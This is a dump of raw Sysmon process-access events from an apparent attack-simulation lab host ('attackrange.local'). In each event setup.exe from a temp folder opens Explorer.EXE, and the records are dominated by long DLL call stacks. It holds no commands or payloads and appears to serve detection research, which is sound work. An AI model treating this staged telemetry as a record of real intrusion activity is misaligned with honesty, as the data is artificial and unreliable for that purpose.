C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
